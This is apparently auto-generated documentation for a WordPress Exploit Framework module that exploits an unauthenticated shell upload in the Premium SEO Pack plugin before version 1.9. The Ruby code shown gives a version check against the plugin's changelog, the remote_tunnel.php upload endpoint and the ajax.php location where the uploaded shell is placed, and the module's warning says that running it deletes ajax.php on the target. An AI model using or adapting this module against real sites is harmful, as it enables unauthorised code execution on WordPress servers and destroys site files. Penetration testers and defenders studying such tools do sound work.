class Wpxf::Exploit::PremiumSeoPackShellUpload

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/exploit/shell/premium_seo_pack_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Premium SEO Pack < v1.9 Unauthenticated Shell Upload',
    references: [
      ['WPVDB', '7934']
    ]
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/premium_seo_pack_shell_upload.rb, line 23
def check
  readme = normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'changelog.txt')
  check_version_from_custom_file(readme, /##\s\[(\d\.\d(\.\d)*)\]/, '1.9')
end
emit_usage_info() click to toggle source
# File lib/wpxf/modules/exploit/shell/premium_seo_pack_shell_upload.rb, line 17
def emit_usage_info
  emit_warning 'When executing this module, the ajax.php file in premium-seo-pack/modules/remote_support will be deleted. '\
               'In order to be able to re-use this module on the same target, be sure to re-create ajax.php if ' \
               'the selected payload is unable to re-create it automatically.'
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/premium_seo_pack_shell_upload.rb, line 32
def uploaded_payload_location
  normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'modules', 'remote_support', 'ajax.php')
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/premium_seo_pack_shell_upload.rb, line 28
def uploader_url
  normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'modules', 'remote_support', 'remote_tunnel.php')
end